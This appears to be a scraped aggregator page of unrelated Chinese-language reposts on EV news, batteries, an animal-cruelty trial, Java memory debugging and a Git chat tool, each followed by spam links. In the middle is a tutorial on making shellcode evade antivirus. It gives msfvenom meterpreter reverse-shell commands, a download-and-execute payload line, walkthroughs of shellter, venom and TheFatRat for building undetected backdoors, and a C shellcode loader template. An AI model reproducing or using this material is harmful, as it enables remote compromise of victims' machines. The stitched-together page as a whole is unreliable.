殘忍屠宰涉虐待動物 法國屠宰場5人受審

摘錄自2018年09月17日中央社報導

法國南部一處屠宰場的前負責人和4名員工17日出庭受審,起因於法國動保團體L214於2016年3月把在莫萊昂利沙爾(Mauleon-Licharre)屠宰場秘密錄製的影片傳上網,引發廣泛憤慨,其後又陸續上傳了在另外兩家屠宰場拍攝的類似影片,促使國會出面調查,當局也對全法國屠宰場展開了連串檢查。

動保團體L214的高提耶(Brigitte Gothiere)說:「這場審判是顯示國家和獸醫系統應負責的機會,我們希望這場審判將確認,因(他們)未遵守法令,造成這些動物極端痛苦。」

本站聲明:網站內容來源環境資訊中心https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※超省錢租車方案

※別再煩惱如何寫文案,掌握八大原則!

※回頭車貨運收費標準

※教你寫出一流的銷售文案?

※FB行銷專家,教你從零開始的技巧

※聚甘新

JAGUAR電動概念車I-PACE問世,即日起接受預訂

縱然超跑相較於整個汽車市場而言是小眾需求,但總是更能吸引使用者目光。Tesla Model S P100D以百公里加速最低只要2.5秒的性能挑戰電動車的極限;但如今,真正的超跑JAGUAR來了!

在今年洛杉磯的車展前,英國車商JAGUAR正式發表旗下第一款純電動SUV車的概念車款「I-PACE Concept」,百公里加速僅需4 秒鐘,擁有400匹馬力。電池相容於50kW(DC)的充電系統,充飽電池僅需2小時,續航力達500公里,超過Tesla Model X 的400 公里。SUV的定位,使I-PACE同時具有家用車的功能與超跑的性能。

JAGUAR表示,I-PACE已開發到非常接近量產的階段,預計在2018年就能上市,有興趣的買家即日起就能,且不需預付訂金。但JAGUAR並未公布產品售價。

貴賓體驗會,HTC Vive助拳

JAGUAR在11月16日舉辦I-PACE Concept的貴賓體驗會,透過HTC Vive的虛擬實境(VR)功能,帶領超過300名貴賓先睹為快。

JAGUAR擁有參加電動方程式賽車Formula-E的經驗,因此格外重視車款的操作感,並以駕駛人為中心來設計駕駛呈現與系統回饋;為此,I-PACE的前後車軸都裝置了電動馬達,以優化駕駛表現。

I-PACE Concept 的內裝設計。(來源:JAGUAR)

設計總監Ian Callum表示,I-PACE展現了次世代的電動車設計概念,它「擁有炫目、充滿未來感的設計,以及美觀的內裝,同時承襲了JAGUAR的美學基因、電子科技,以及當代工藝技術。」

Ian Callum指出,藉由HTC Vive的VR科技,I-PACE的體驗會也為與會貴賓提供全方位且深入的全新體驗。與會者將可透過HTC Vive仔細觀察I-PACE的內裝與細節,且JAGUAR也將把VR內容公開,讓全球民眾自由下載體驗。

(照片來源:)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※台北網頁設計公司這麼多該如何選擇?

※智慧手機時代的來臨,RWD網頁設計為架站首選

※評比南投搬家公司費用收費行情懶人包大公開

※回頭車貨運收費標準

※聚甘新

電動車:Porsche、BMW分提量產與升級目標

隨著全球主要車商接連踏入電動車研發製造行列,電動車產業也正式宣告進入競爭時代。德商BMW與Volkswagen旗下的Porsche近日分別發表新的發展計劃,各自朝升級與量產邁進。

Porsche Mission E 目標2 萬台

Mission E 是Porsche 旗下第一款電動車,預計在2019年上市。Porsche日前宣布,Mission E的年銷售目標是2萬台。

Porsche是Volkswagen集團營收第二名的品牌,電動車部門擁有約1,400人。今年7月,Porsche曾拒絕透露Mission E的出貨目標,但表示每年要出貨1萬台才能獲利。

Porsche把Tesla視為主要競爭對手,而Tesla在2015年的出貨量超過5萬台。

BMW預計2017年推新款

BMW的經典電動車款i3又有新消息。德媒報導,BMW預計將在2017年推出新款的i3電動車,將重新打造車頭、車尾設計,並裝置新的車用電池,史最大行駛里程數提高到300公里。

BMW雖然對電動車事業投注極大心力,但收益不算太好。2015年,i3銷售量只有2.5萬台。

BMW認為,提高i3的續航力將有助提高銷售數字,因此將以電池升級為軸心推出新款i3,搶攻市場。現行銷售款的BMW i3續航力只有183 公里,相較之下,Tesla Model S車款的續航力達483公里之遠。

(照片:Porsche Mission E。來源:)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※教你寫出一流的銷售文案?

※廣告預算用在刀口上,台北網頁設計公司幫您達到更多曝光效益

※回頭車貨運收費標準

※別再煩惱如何寫文案,掌握八大原則!

※超省錢租車方案

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※聚甘新

車用鋰電池需求夯!Panasonic傳擬在歐建新廠

日本媒體日刊工業新聞29日報導,因以歐系為主的車廠相繼將電動車(EV)、插電式油電混合車(PHV)等電動化車種視為重點研發對象,帶動車用鋰離子電池需求旺盛,故Panasonic計畫在2022年結束前於歐洲興建車用鋰離子電池新工廠,預估投資額將達數百億日圓。2017年全球電動化車種產量預估為450萬台,2022年將增至約1,900萬台、佔整體產量比重約2成。

報導指出,Panasonic目前正在美國內華達州、中國大連市興建電池工廠,合計投資額達約2,000億日圓,其中美國工廠預計於今年內、大連工廠預計於2017年2月啟用,且Panasonic也正擴增日本國內電池工廠產能,但即便如此,預估Panasonic產能仍無法滿足需求,故計畫在歐洲興建新廠。

據報導,Panasonic為全球車用鋰離子電池龍頭廠,和南韓三星、LG的競爭火熱,而該兩家韓廠也正在東歐興建新工廠,預計於2017-2018年啟用,故Panasonic也期望藉由在歐洲興建新工廠對抗韓廠。

日經新聞11月7日報導,因全球各國紛紛強化汽車環保規範,故日本汽車業龍頭豐田汽車(Toyota)計畫在2020年結束前整備電動車(EV)量產體制、正式搶進EV市場。據報導,目前豐田環保車策略以油電混合車(HV)、燃料電池車(FCV)為主,今後則將擴充陣容、將EV也定位為環保車的主力產品,且將視比亞迪(BYD)、特斯拉(Tesla)等競爭對手動向,決定生產體制。

根據日本市調機構富士經濟(Fuji Keizai)公布的調查報告顯示,PHV、EV在2025年以後的需求增幅將加快,預估2030年左右時,HV、PHV、EV將呈現幾乎相互抗衡的局面,2035年在北美、歐洲、中國需求加持下,PHV、EV市場將進一步擴大,超越HV。

富士經濟指出,全球EV市場當前將持續呈現緩和增長,不過預估自2020年左右起,EV需求將呈現急速擴大,預估2035年全球EV市場規模將達567萬台、將較2015年飆增近16倍(成長1,567%);另外,2035年全球PHV市場規模將達665萬台、將較2015年(21萬台)飆增近31倍(成長3,066%)。

(本文內容由 授權提供。照片來源:Panasonic)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※超省錢租車方案

※別再煩惱如何寫文案,掌握八大原則!

※回頭車貨運收費標準

※教你寫出一流的銷售文案?

※FB行銷專家,教你從零開始的技巧

※聚甘新

俄羅斯核電池新進展 用鎳奈米簇將 β 射線轉換成電

摘錄自2018年9月20日科技新報報導

俄羅斯國立核研究大學(MEPhI)近期發表在《Applied Physics Letters》的研究成果顯示,已成功透過同位素鎳 63 奈米簇將 β 射線轉換成電,研發出號稱使用壽命可長達 100 年的核電池,有助於醫療微型設備、小型機器人與航太、極地深海探測器。

現在目前已經可以透過微機電系統(micro-electromechanical)與奈機電系統(nano-electromechanical)把操作範圍限制在微米、甚至是奈米範圍內,讓科學家打造更小的醫療與遠程設備,但仍缺乏相對應的電池,現在的微型鋰離子電池、小型太陽能電池或是燃料電池體積還是太大,而且也有壽命限制。

因此科學家將目光轉向核電池。MEPhI 物理技術度量衡問題學院助理教授 Pyotr Borisyuk 表示,團隊透過研究鎳奈米簇鎳薄膜的電─物理特性,打造「不同於以往」的物理系統,可以有效將鎳 63 同位素的 β 衰退能量轉換成電,且鎳奈米簇薄膜內部還可產生二次電子,進一步增強 β 粒子非彈性碰撞產生的電流,實驗中也沒有使用難以製造的半導體系統來轉換鎳 63 的衰退能量。透過獨特的鎳奈米簇薄膜與梯度分布技術,核電池又朝商業化更進一步。

本站聲明:網站內容來源環境資訊中心https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※台北網頁設計公司這麼多該如何選擇?

※智慧手機時代的來臨,RWD網頁設計為架站首選

※評比南投搬家公司費用收費行情懶人包大公開

※回頭車貨運收費標準

※聚甘新

國際組織籲中止東奧 日政府「洗腦似的」宣傳福島 核污仍反覆出現

文:宋瑞文(媽媽監督核電廠聯盟特約撰述)

本站聲明:網站內容來源環境資訊中心https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※台北網頁設計公司這麼多該如何選擇?

※智慧手機時代的來臨,RWD網頁設計為架站首選

※評比南投搬家公司費用收費行情懶人包大公開

※回頭車貨運收費標準

※聚甘新

Java內存溢出OutOfMemoryError的產生與排查

在java的虛擬機異常中,有兩個異常是大家比較關心的,一個是StackOverflowError,另一個是OutOfMemoryError。今天我們就來看看OutOfMemoryError是怎麼產生的,以及如何去排查這個異常。

概念

要了解什麼是OutOfMemoryError,我們可以直接看一下OutOfMemoryError的源碼,在類上的英文註釋很好的闡述了什麼是OutOfMemoryError,翻譯過來的意思是,由於內存不足,虛擬機沒有可分配的內存了,垃圾回收器也不能釋放更多的內存。在生產環境中,由於訪問量過大,把內存吃滿,會出現OutOfMemoryError的異常,小夥伴們如果沒有經驗的話,往往束手無策,到底是真的內存不夠用了,還是自己的程序有問題,也不知道如何去排查這樣的異常。

模擬OutOfMemoryError

在這裏,我們寫一段程序,來模擬一下OutOfMemoryError如何產生,我們創建一個List對象,然後向裡邊不停的添加1M的Byte,如下;

 public static void main(String[] args) {
     List<Byte[]> list = new ArrayList<>();
     int i = 0;
     try {
         while (true) {
             list.add(new Byte[1024 * 1024]);
             i++;
         }
     } catch (Throwable e) {
         e.printStackTrace();
         System.out.println("執行了"+i+"次");
     }
 }
  • 我們寫了一個while(true)循環,每次都add一個1M的字節對象,1024*1024正好1M。
  • 我們用i的值記錄總共執行了幾次。
  • 如果這樣不停的執行下去,不管你有多大的內存,都會被吃光的。

我們為了讓程序運行時,快速的拋出OutOfMemoryError異常,可以在java的啟動命令行增加啟動參數,設置堆內存的初始值和最大值。這兩個值在生產環境下,通常也是要配置的哦,要充分利用機器的內存嘛,如果不配置就會使用默認值。到時候由於內存不足向老闆申請機器,可別挨罵哦~

那這兩個參數怎麼去加呢?

  • -Xms ,-Xms設置初始堆內存的大小
  • -Xmx, -Xmx設置最大堆內存的大小

通常情況下,這兩個值設置成一樣就可以了,總之,我們設置了堆內存的大小。我們在IDEA的啟動配置中,統一設置堆內存為80M,如下;

好了~~我們運行一下,看看會不會拋出OutOfMemoryError異常吧

java.lang.OutOfMemoryError: Java heap space
	at com.diancan.JavaOOMDemo.main(JavaOOMDemo.java:14)
執行了14次

執行了14次,拋出了OutOfMemoryError異常。但是,如果拋出這樣一個異常,我們怎麼去排查呢?就這一行日誌也看不出什麼來啊。

排查

說到排查,如果我們能夠拿到異常時的內存快照,然後通過一些工具就可以了進行內存的分析了。那麼我們怎麼去拿到內存溢出時的快照呢?其實,JDK也為我們提供了這樣的命令參數,我們來看一下吧,

  • -XX:+HeapDumpOnOutOfMemoryError,從字面就可以很容易的理解,在發生OutOfMemoryError異常時,進行堆的Dump,這樣就可以獲取異常時的內存快照了。
  • -XX:HeapDumpPath=D:\heap-dump\ ,這個也很好理解,就是配置HeapDump的路徑,方便我們管理,這裏我們配置為D:\heap-dump,當然你也可以根據自己的需要,定義為其他的目錄。

注意,HeapDumpPath的目錄一定要手動創建好,如果沒有這個目錄,Dump會失敗的。

IDEA中的配置,如圖:

我們再運行一下程序,看看是什麼樣子,

java.lang.OutOfMemoryError: Java heap space
Dumping heap to D:\heap-dump\java_pid24312.hprof ...
Heap dump file created [123468648 bytes in 0.141 secs]
java.lang.OutOfMemoryError: Java heap space
	at com.diancan.JavaOOMDemo.main(JavaOOMDemo.java:14)
執行了14次

我們發現日誌上面多了點東西,創建了一個文件,在D:\heap-dump\java_pid24312.hprof。這個文件就是我們的內存快照。那麼問題來了,我們如何查看這個文件呢?直接打開是不行的,用寫字板等也是不行的,那怎麼辦?其實也沒那麼複雜,使用JDK自帶的jvisualvm就可以查看。

這裏邊有個小坑,如果大家用JDK8,可以在JDK的bin目錄下找到jvisualvm.exe,但是如果你使用的是JDK8以上的版本,就本示例中,使用的是JDK11,在bin目錄下是找不到jvisualvm.exe的。大家可以去visualvm的主頁下載。

我們啟動visualvm,進入到如下的頁面,

然後,點擊左上角的加載快照按鈕,然後選擇剛才我們Dump的文件,

我們重點看一下右側中間的部分,

類的實例大小排序,可以看到,我們的Byte佔了96.5%。詳細的信息,我們可以點進去看,包括變量里存的內容,這樣我們就可以很快的定位到內存溢出的位置,並且可以判斷是真的內存不夠了,還是我們的代碼出了問題。

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※台北網頁設計公司這麼多該如何選擇?

※智慧手機時代的來臨,RWD網頁設計為架站首選

※評比南投搬家公司費用收費行情懶人包大公開

※回頭車貨運收費標準

Git 居然可以用來跟女神聊天?

Git 是用來做啥的?想必碼農朋友都知道,Git 是版本控制軟件,是軟件開發過程中團隊協作不可或缺的軟件。

但是,作為版本控制軟件的 Git ,能跟聊天工具扯上關係嗎?這二者似乎毫無關係,但腦洞大開的外國朋友 Ephi Gabay 就開發了一個 GIC ,活生生將 Git 改造成了一個聊天工具,有了它你就可以跟女神親密溝通了!

這位哥們是用 Node.js 寫了這麼一個工具,將 Git 改裝成後台數據庫!更詳細的,他其實是把每一句聊天作為 commit 的內容提交到倉庫里!所以,執行 git log 時,可以看到完整的對話過程。想必當年 Linus 怎麼也不會想到,他寫的 Git 會這麼被人改造!

這個項目的地址如下:

https://github.com/ephigabay/GIC

下面良許帶你一步步實現這個騷過程。

1. 創建一個倉庫

因為整個聊天的過程,其實就是不停在提交的過程,所以我們需要創建一個倉庫。這個倉庫,肯定不能是你現在工作用的倉庫,否則你之前的工作過程就全玩完了。

倉庫的創建不難吧?這裏簡單演示一下:

mkdir gitchat
cd gitchat
git init
echo "chat logs" > README
git add README
git commit -m 'fist commit'

2. 安裝 GIC

既然 GIC 是基於 Git 的,那麼 Git 肯定是需要安裝的。而且 GIC 是使用 Node.js 編寫的,所以需要安裝 nodejs 。後面我們還需要用到 npm 命令,所以我們還需要安裝一個 npm 。

如果是 Ubuntu 平台的話,安裝過程可以使用以下命令:

sudo apt-get install git nodejs npm

如果是其它平台,請參照各自平台的安裝指導手冊。

然後,我們需要將 GIC 這個項目拷到自己的電腦上,如下:

git clone https://github.com/ephigabay/GIC GIC

等 GIC 完整拷備到電腦上后,我們進入到目錄里並安裝一些依賴文件:

cd GIC
npm install

這個安裝過程可能要花費一些時間,靜靜等待即可。

3. 配置 GIC

對於 GIC 我們只需要配置第 1 步所建的那個倉庫路徑即可,需要編輯 config.js 文件的 gitRepo 字段:

module.exports = {
    gitRepo: '/home/pi/tests/gitchat/.git', #配置你的聊天倉庫路徑
    messageCheckInterval: 500,
    branchesCheckInterval: 5000
};

在正式開始聊天之前,我們先試一下配置是否正確:

git clone --quiet /home/pi/tests/gitchat/.git > /dev/null

如果上面那步沒報錯的話,說明你所配置的路徑就是正確的。

接下來,我們就可以正式開始和女神聊天了。

4. 使用 Git 開始聊天

開始聊天時,我們可以在 GIC 目錄里使用以下命令啟動聊天:

npm start

之後,你就會看到一個文字版的聊天窗口了。左邊就是聊天內容,右邊是分支。不同的分支就是不同的通道,相當於不同的聊天室,裏面的聊天內容也是不同的。

但是,請注意,如果倉庫里你當前所在的分支是 master 分支,那麼你就不能在這個分支里聊天,要切到其它分支聊天,否則會報錯。

如果要多人聊天的話,每個用戶只需進到 GIC 目錄,然後執行 npm start 命令即可參与聊天。

前面說了,這個聊天的過程其實是依託 git log ,所以我們在 git log 里可以看到完整的聊天記錄:

pi@raspberrypi:~/tests/gitchat $ git log --pretty=format:"%p %cn %s" dev
371a477 evis hao a, wanshange jiu qu!
b6cc4ae alvin yan wo ye hen hao, yao bu yao qu gongyuan zouzou?
7bfea8f evis fine, good, and you?
017d82f alvin yan hello evis, how are you?
 alvin yan init commit

5. 退出聊天

有兩種方法:

  1. 按一下 Esc ,再按 ctrl+C
  2. 執行以下命令:
sudo kill `pgrep npm`

公眾號:良許Linux

有收穫?希望老鐵們來個三連擊,給更多的人看到這篇文章

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※教你寫出一流的銷售文案?

※廣告預算用在刀口上,台北網頁設計公司幫您達到更多曝光效益

※回頭車貨運收費標準

※別再煩惱如何寫文案,掌握八大原則!

※超省錢租車方案

※產品缺大量曝光嗎?你需要的是一流包裝設計!

shellcode 免殺(一)

工具免殺

選擇了幾個簡單或者近期還有更新的免殺工具進行學習

ShellcodeWrapper

項目地址

https://github.com/Arno0x/ShellcodeWrapper

該工具的原理是使用異或加密或者aes加密,做到混淆,進行免殺。

先使用msfvenom生成raw格式文件

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f raw -o shellcode.raw

下面命令mi0 是密碼隨意寫即可。

python shellcode_encoder.py -cpp -cs -py payload/shellcode.raw mi0 xor

會生成3個文件,用C++編譯的cpp文件,用python編譯的py文件和用c#編譯的cs文件

直接丟到vs中把cpp編譯生成exe文件即可,上傳目標服務器。

unicorn

項目地址

https://github.com/trustedsec/unicorn.git

從github上下載下來就可以運行,使用方法非常簡單

支持生成ps1、macro、hta、dde等形式的代碼和文件

所有類型的使用方法如下

Usage: 
python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>

PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
PS Down/Exec Macro: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe macro
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example SettingContent-ms: python unicorn.py <cobalt_strike_file.cs cs ms
HTA Example SettingContent-ms: python unicorn.py <patth_to_shellcode.txt>: shellcode ms
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00 or metasploit)
Custom Shellcode HTA: python unicorn.py <path_to_shellcode.txt> shellcode hta (formatted 0x00 or metasploit)
Custom Shellcode Macro: python unicorn.py <path_to_shellcode.txt> shellcode macro (formatted 0x00 or metasploit)
Generate .SettingContent-ms: python unicorn.py ms

這裏生產powershell的腳本

python unicorn.py windows/meterpreter/reverse_tcp 192.168.2.1 4444 

運行powershell的腳本即可

shellter

shellter使用的是PE文件注入的方式,測試kali和windows的版本,感覺windows的還要方便穩定一點

windows版本下載地址

Download

以windows為例下載后直接運行shellter.exe

主要一開始有2個模式,一個Auto一個manual

Auto的選項要少很多,更加的方便,manual選項很多,可以自定義調用的混淆模塊等參數

Choose Operation Mode - Auto/Manual (A/M/H): A

Perform Online Version Check? (Y/N/H): N

#此處輸入注入的PE文件,這裏注入D盾
PE Target: \\vmware-host\Shared Folders\Mac 上的 mi0\script\kali\D_Safe_Manage.exe	

......(等待)

#選擇是否開啟隱藏模式
Enable Stealth Mode? (Y/N/H): N

#選擇回連payload的方式
************
* Payloads *
************

[1] Meterpreter_Reverse_TCP   [stager]
[2] Meterpreter_Reverse_HTTP  [stager]
[3] Meterpreter_Reverse_HTTPS [stager]
[4] Meterpreter_Bind_TCP      [stager]
[5] Shell_Reverse_TCP         [stager]
[6] Shell_Bind_TCP            [stager]
[7] WinExec

#選擇輸入listed payload輸入
Use a listed payload or custom? (L/C/H): L

#輸入payload的編號
Select payload by index: 1

***************************
* meterpreter_reverse_tcp *
***************************
#設置監聽地址和端口
SET LHOST: 192.168.2.1

SET LPORT: 4444

.....(等待生成成功即可)

目標服務器上運行程序即可反彈shell(我這裏用msf的模塊監聽即可收到shell)

venom

項目地址

https://github.com/r00t-3xp10it/venom

安裝起來步驟比較繁瑣,主要是依賴問題

進入到目標文件夾

sudo aux/setup.sh

會幫你安裝所有需要的依賴,之後運行

sudo ./venom.sh

選擇目標的模塊

            __    _ ______  ____   _  _____  ____    __
           \  \  //|   ___||    \ | |/     \|    \  /  |
            \  \// |   ___||     \| ||     ||     \/   |
             \__/  |______||__/\____|\_____/|__/\__/|__|1.0.16
     USER:kali ENV:vm INTERFACE:eth0 ARCH:x64 DISTRO:Kali
    ╔─────────────────────────────────────────────────────────────╗
    ║   1 - Unix based payloads                                   ║
    ║   2 - Windows-OS payloads                                   ║
    ║   3 - Multi-OS payloads                                     ║
    ║   4 - Android|IOS payloads                                  ║
    ║   5 - Webserver payloads                                    ║
    ║   6 - Microsoft office payloads                             ║
    ║   7 - System built-in shells                                ║
    ║   8 - Amsi Evasion Payloads                                 ║
    ║                                                             ║
    ║   E - Exit Shellcode Generator                              ║
    ╚─────────────────────────────────────────────────────────────╣
                                                  SSARedTeam@2019_|
[] Shellcode Generator
[] Chose Categorie number: 2

之後會彈出適應該模塊的免殺方式以及生成文件格式,輸入對應的編號即可

之後分別會彈出接收shell的host輸入框,接收shell的port輸入框,反彈shell的payload選擇框(都是msf的),輸入生成文件的名字

後面2個參數都選deafult默認即可

參數輸完之後,去vemon項目下的output中取生成的shell發送到目標服務器上運行即可

注:windows 1的dll文件shell能夠繞過windows 10自帶病毒檢測(這就很nice)

運行dll可以使用以下命令

rundll32.exe test.dll,main

TheFatRad

項目地址

https://github.com/Screetsec/TheFatRat

安裝步驟很簡單

chmod +x setup.sh && ./setup.sh

更新(更新后還要重新setup.sh一下)

./update && chmod +x setup.sh && ./setup.sh

再檢查下組件是否正常

chmod +x chk_tools 
./chk_tools

注意下即使組件正常也要安裝names的python依賴,之後調用模塊的時候會用到

pip install names

踩坑:我的環境是kali20.2,這個版本的kali使用的kali用戶而不是root用戶,用sudo pip安裝了后,啟動fatrat還是說找不到names模塊,這時候需要sudo su切換到root用戶進行names的安裝

在安裝時會發現它還需要BDF這個免殺作為依賴

在確定所有組件安裝完畢后運行

sudo ./fatrat

稍等片刻進入界面

2         ____                                                              
        |    |                                                             
        |____|                                                             
       _|____|_       _____ _       _____     _   _____     _              
        /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_            
      .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|           
     /\ \.-.' \        |_| |_|_|___|__|  |___|_| |__|__|___|_|             
    J  \.|'.\/ \                                                           
    | |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--]          
     \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]          
     L   /|o'--'\   [--]            Version: 1.9.7           [--]          
     |  /\/\/\   \  [--]          Codename: Whistle          [--]          
     J /      \.__\ [--]   Follow me on Github: @Screetsec   [--]          
     J /      \.__\ [--]   Dracos Linux : @dracos-linux.org  [--]          
     |/         /   [--]                                     [--]          
       \      .'\.  [--]     SELECT AN OPTION TO BEGIN:      [--]          
    ____)_/\_(___\. [--] .___________________________________[--]          
   (___._/  \_.___)'\_.-----------------------------------------/          
                                                                           
                                                                           
        [01]  Create Backdoor with msfvenom                                
        [02]  Create Fud 100% Backdoor with Fudwin 1.0                     
        [03]  Create Fud Backdoor with Avoid v1.2                          
        [04]  Create Fud Backdoor with backdoor-factory             
        [05]  Backdooring Original apk [Instagram, Line,etc]               
        [06]  Create Fud Backdoor 1000% with PwnWinds [Excelent]           
        [07]  Create Backdoor For Office with Microsploit                  
        [08]  Trojan Debian Package For Remote Acces [Trodebi]             
        [09]  Load/Create auto listeners                                   
        [10]  Jump to msfconsole                                           
        [11]  Searchsploit                                                 
        [12]  File Pumper [Increase Your Files Size]                       
        [13]  Configure Default Lhost & Lport                              
        [14]  Cleanup                                                      
        [15]  Help                                                         
        [16]  Credits                                                      
        [17]  Exit                                                         
                                                                           
 ┌─[TheFatRat]──[~]─[menu]:                                                
 └─────►2      

這裏官方推薦02和06模塊,這裏使用02的模塊中的udp加殼

   _______ ___ ___ ______   ___ ___ ___ ______  
  |   _   |   Y   |   _  \ |   Y   |   |   _  \ 
  |.  1___|.  |   |.  |   \|.  |   |.  |.  |   |
  |.  __) |.  |   |.  |    |. / \  |.  |.  |   |
  |:  |   |:  1   |:  1    |:      |:  |:  |   |
  |::.|   |::.. . |::.. . /|::.|:. |::.|::.|   |
   ---     ------- ------   --- --- --- --- ---   1.0
 
 Select one tool to create your Windows EXE FUD Rat 
 

 [ 1 ] - Powerstager 0.2.5 by z0noxz (powershell) (NEW)
 [ 2 ] - Slow But Powerfull (OLD)
 [ 3 ] - Return to menu

 ┌─[TheFatRat]──[~]─[FUDWIN]:
 └─────► 2

會出現填寫lhost和lport的提示框

之後會等很長一段時間,生成exe文件,上傳到目標服務器運行即可

監聽使用msf的windows/meterpreter/reverse_tcp)即可
該免殺工具也能過win10的自帶防火牆

手動修改代碼

免殺思路:通過cs和msf生成後門文件,對生成的後門進行代碼處理達到免殺

避免彈出黑窗

在編寫c代碼的時候可以加上該語句,則不會觸發黑窗

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

基本格式

編譯環境是VS 2019

在運行前將編譯器的棧緩衝區安全檢查(/Gs) 、數據執行保護(DEP)以及代碼優化關閉關閉

關閉位置:

代碼優化:C/C++ –> 優化

棧緩衝區安全檢查(/Gs):C/C++ –> 代碼生成 –> 安全檢查

數據執行保護(DEP):連接器 –> 高級 –> 數據執行保護

我們可以使用下面的模板生成shellcode,將msf或者cs的shellcode放入到buf數組變量中即可。

在運行前可以對buf中的字符進行處理達到免殺(之後會學習記錄下如何手寫shellcode)

#include <windows.h>
#include <iostream>
#include <time.h>
#pragma comment (lib, "winmm.lib")

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
void startShellCode()
{
	unsigned char buf[] = "";

	void* exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, buf, sizeof(buf));
	((void(*)())exec)();
}

void main() {
	startShellCode();
}

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※超省錢租車方案

※別再煩惱如何寫文案,掌握八大原則!

※回頭車貨運收費標準

※教你寫出一流的銷售文案?

※FB行銷專家,教你從零開始的技巧

智慧汽車前景看好,車用LED廠展開投資

近來,陸續有汽車與科技大廠於加州展開無人駕駛路上測試,智慧汽車儼然成為科技市場的新藍海。這股趨勢也吸引光學鏡頭和LED廠商展開投資。

看好無人駕駛技術發展潛力,除Tesla、Ford、GM與Goole等廠商展開道路測試外,也有鏡頭廠和LED廠開始投入。自駕車上路仰賴感測器進行路況偵測,因此感測器和車燈比以往更受重視,以滿足嚴格的安全性標準。

在車用LED市場方面,日本Panasonic(松下)有意收購歐洲車燈大廠ZKW,結合自家感測器專長,攻自駕車市場;而據《聯合財經網》報導,台廠群光以子公司群電買下中國車燈廠以進攻其供應鏈,且與LED車燈廠頻繁接觸,同樣有意搶食車用LED這塊大餅。

另外,照明大廠歐司朗(OSRAM)在2017年調降LED車用成本,為的是加快市場滲透率。其採用金屬導線架以取代原先LED陶瓷散熱基板,除成本降低之外,也利於設計;且其車尾燈、方向燈等產品均已改用EMC導線架。

《聯合財經網》指出,有供應商表示,除了LED大燈仍採用陶瓷基板外,其餘車體內外的晝型燈可能改用EMC導線架。隨車用LED應用變多、EMC導線架的使用增加,中國LED晝型的燈滲透率也逼近50%。

 (首圖來源: CC2.0)

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※台北網頁設計公司這麼多該如何選擇?

※智慧手機時代的來臨,RWD網頁設計為架站首選

※評比南投搬家公司費用收費行情懶人包大公開

※回頭車貨運收費標準